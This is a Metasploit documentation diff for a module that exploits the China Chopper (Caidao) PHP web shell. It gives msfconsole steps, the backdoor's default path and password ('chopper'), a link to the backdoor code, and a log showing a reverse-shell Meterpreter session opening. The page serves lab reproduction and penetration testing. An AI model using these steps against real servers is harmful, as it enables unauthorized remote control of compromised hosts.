Land rapid7#7222, Add KB for multi/http/caidao_php_backdoor_exec

Author: wchen-r7

documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md

@@ -0,0 +1,44 @@
+China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
+
+## Vulnerable Application
+
+Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
+  4. Do: `set rport port`
+  5. Do: `set rhost ip`
+  6. Do: `check`
+```
+[+] 192.168.1.103:80 - The target is vulnerable.
+```
+  8. Do: `exploit`
+  9. You should get a shell.
+
+## Options
+
+  **TARGETURI**
+
+  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
+  
+  **PASSWORD**
+  
+  PASSWORD by default is `chopper`, which is the password of the backdoor.
+
+## Demonstration
+
+```
+msf exploit(caidao_php_backdoor_exec) > exploit
+
+[*] Started reverse handler on 192.168.1.108:4444 
+[*] Sending stage (33068 bytes) to 192.168.1.103
+[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
+
+meterpreter > sysinfo 
+Computer    : kali
+OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
+Meterpreter : php/php
+```